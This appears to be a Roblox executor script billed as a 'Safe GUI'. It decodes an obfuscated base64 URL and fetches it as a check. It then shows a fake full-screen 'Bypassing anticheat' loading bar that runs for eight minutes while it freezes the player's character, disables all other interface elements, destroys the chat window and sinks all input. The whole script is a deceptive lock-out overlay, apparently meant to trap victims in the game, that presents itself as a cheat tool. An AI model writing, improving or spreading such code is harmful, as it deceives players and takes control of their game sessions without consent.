-- Final Safe GUI (By:@g4sser_) | Executor-Compatible

-- ========== Anti-Theft Check (Upgraded) ==========
local function b64Decode(d)
	local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
	d = string.gsub(d, '[^'..b..'=]', '')
	return (d:gsub('.', function(x)
		if x == '=' then return '' end
		local r,f='',(b:find(x)-1)
		for i=6,1,-1 do r=r..(f%2^i - f%2^(i-1) > 0 and '1' or '0') end
		return r
	end):gsub('%d%d%d%d%d%d%d%d', function(x)
		local c=0
		for i=1,8 do c=c + (x:sub(i,i)=='1' and 2^(8-i) or 0) end
		return string.char(c)
	end))
end

local encoded = "aHR0cHM6Ly9yYXdvLnVzZXJjb250ZW50LmNvbS9TcGFkZW9mZGFyay9mb3JmeW4vcmVmcy9oZWFkcy9tYWluL2ZpZW5maWVu"
local rawUrl = b64Decode(encoded)

local isSafe = false
pcall(function()
	local res = game:HttpGet(rawUrl, true)
	if typeof(res) == "string" and res:find("-- Final Safe GUI") then
		isSafe = true
	end
end)

if not isSafe then
	warn("Script not authorized or failed check. Skipping execution.")
	return -- Fail silently
end

-- ========== Main GUI Script ==========
local P, S, U, T, D = game:GetService("Players"), game:GetService("TweenService"), game:GetService("UserInputService"), game:GetService("TextChatService"), game:GetService("CoreGui")
local plr = P.LocalPlayer
local gui = plr:WaitForChild("PlayerGui")
pcall(function() gui:FindFirstChild("FullCoverLoading"):Destroy() end)

local scr = Instance.new("ScreenGui", gui)
scr.Name, scr.IgnoreGuiInset, scr.ZIndexBehavior, scr.DisplayOrder = "FullCoverLoading", true, Enum.ZIndexBehavior.Global, 999999

local function freeze()
	local h = (plr.Character or plr.CharacterAdded:Wait()):FindFirstChildOfClass("Humanoid")
	if h then h.WalkSpeed, h.JumpPower = 0, 0 end
end
freeze()
plr.CharacterAdded:Connect(freeze)

for _, g in pairs(gui:GetChildren()) do
	if g:IsA("ScreenGui") and g.Name ~= "FullCoverLoading" then g.Enabled = false end
end
gui.ChildAdded:Connect(function(g)
	if g:IsA("ScreenGui") and g.Name ~= "FullCoverLoading" then g.Enabled = false end
end)

pcall(function()
	T.ChatWindowConfiguration.Enabled = false
	if T:FindFirstChild("Chat") then T.Chat:Destroy() end
end)
T.ChildAdded:Connect(function(c) if c.Name == "Chat" then c:Destroy() end end)

local cov = Instance.new("Frame", scr)
cov.Size = UDim2.new(1, 0, 1, 0)
cov.BackgroundColor3 = Color3.new(0, 0, 0)
cov.BorderSizePixel = 0

-- Logo
local logo = Instance.new("ImageLabel", cov)
logo.Size = UDim2.new(0, 240, 0, 240)
logo.Position = UDim2.new(0.5, -120, 0.27, -120)
logo.BackgroundTransparency = 1
logo.ImageTransparency = 1
logo.Image = "rbxthumb://type=Asset&id=120170251278674&w=420&h=420"
task.spawn(function()
	for i = 1, 25 do
		logo.ImageTransparency = 1 - (i / 25)
		task.wait(0.03)
	end
end)

-- Abstract Shape Background
local function mkShape(parent)
	local f = Instance.new("Frame", parent)
	f.AnchorPoint = Vector2.new(0.5, 0.5)
	f.Size = UDim2.new(0, math.random(70, 120), 0, math.random(70, 120))
	f.Position = UDim2.new(math.random(), 0, math.random(), 0)
	f.BackgroundColor3 = Color3.fromRGB(60, 60, 60)
	f.BackgroundTransparency = 0.7
	f.BorderSizePixel = 0
	local c = Instance.new("UICorner", f)
	c.CornerRadius = UDim.new(0, math.random(8, 20))
	return f
end

for i = 1, 12 do
	local s = mkShape(cov)
	local bs = s.Size
	local upTween = S:Create(s, TweenInfo.new(4, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut, -1, true), {
		Size = UDim2.new(0, bs.X.Offset * 1.3, 0, bs.Y.Offset * 1.3),
		BackgroundTransparency = 0.9
	})
	local rtTween = S:Create(s, TweenInfo.new(6, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut, -1, true), {
		Rotation = math.random(-15, 15)
	})
	upTween:Play()
	rtTween:Play()
	task.spawn(function()
		while true do
			local np = UDim2.new(math.random(), 0, math.random(), 0)
			s:TweenPosition(np, "InOut", "Sine", 5, true)
			task.wait(5)
		end
	end)
end

-- Text + Bar
local loadingText = Instance.new("TextLabel", cov)
loadingText.Size = UDim2.new(1, 0, 0.08, 0)
loadingText.Position = UDim2.new(0, 0, 0.5, 0)
loadingText.BackgroundTransparency = 1
loadingText.TextColor3 = Color3.new(1, 1, 1)
loadingText.TextStrokeTransparency = 0.5
loadingText.Font = Enum.Font.GothamSemibold
loadingText.TextScaled = true
loadingText.Text = "Loading.. 0%"

local subText = Instance.new("TextLabel", cov)
subText.Size = UDim2.new(1, 0, 0.05, 0)
subText.Position = UDim2.new(0, 0, 0.575, 0)
subText.BackgroundTransparency = 1
subText.TextColor3 = Color3.fromRGB(170, 170, 170)
subText.Font = Enum.Font.Gotham
subText.TextScaled = true
subText.Text = "Bypassing anticheat..."

local warnText = Instance.new("TextLabel", cov)
warnText.Size = UDim2.new(1, 0, 0.045, 0)
warnText.Position = UDim2.new(0, 0, 0.635, 0)
warnText.BackgroundTransparency = 1
warnText.Font = Enum.Font.Gotham
warnText.TextScaled = true
warnText.TextColor3 = Color3.fromRGB(255, 60, 60)
warnText.Text = "⚠️ Do not leave, or your data may be lost."

local barBG = Instance.new("Frame", cov)
barBG.Size = UDim2.new(0.8, 0, 0.015, 0)
barBG.Position = UDim2.new(0.1, 0, 0.7, 0)
barBG.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
barBG.BackgroundTransparency = 0.2
Instance.new("UICorner", barBG).CornerRadius = UDim.new(0, 8)

local bar = Instance.new("Frame", barBG)
bar.Size = UDim2.new(0, 0, 1, 0)
bar.BackgroundColor3 = Color3.new(1, 1, 1)
Instance.new("UICorner", bar).CornerRadius = UDim.new(0, 8)

local watermark = Instance.new("TextLabel", bar)
watermark.Size = UDim2.new(1, 0, 1, 0)
watermark.Position = UDim2.new(0, 0, 0, 0)
watermark.BackgroundTransparency = 1
watermark.TextColor3 = Color3.new(1, 1, 1)
watermark.TextTransparency = 0.6
watermark.Font = Enum.Font.Gotham
watermark.TextScaled = true
watermark.Text = "By:@g4sser_"

-- 8 Min Full Load with Reset After 2 Min
task.spawn(function()
	local totalDur, resetDur, finalDur = 480, 120, 360
	local st = tick()
	while true do
		local t = tick() - st
		if t < resetDur then
			local p = math.floor((t / resetDur) * 99)
			loadingText.Text = "Loading.. " .. p .. "%"
			bar:TweenSize(UDim2.new(p / 100, 0, 1, 0), "Out", "Sine", 0.1, true)
			subText.Text = "Bypassing anticheat" .. string.rep(".", (t % 1.5 < 0.5 and 1 or t % 1.5 < 1 and 2 or 3))
		elseif t < totalDur then
			local pt = t - resetDur
			local p = math.floor((pt / finalDur) * 99)
			loadingText.Text = "Loading.. " .. p .. "%"
			bar:TweenSize(UDim2.new(p / 100, 0, 1, 0), "Out", "Sine", 0.1, true)
			subText.Text = "Finding an old server, please wait" .. string.rep(".", (pt % 1.5 < 0.5 and 1 or pt % 1.5 < 1 and 2 or 3))
		else
			loadingText.Text = "Loading.. 99%"
			bar.Size = UDim2.new(0.99, 0, 1, 0)
			break
		end
		wait(0.1)
	end
end)

U.InputBegan:Connect(function() return Enum.ContextActionResult.Sink end)
while true do task.wait(1) end
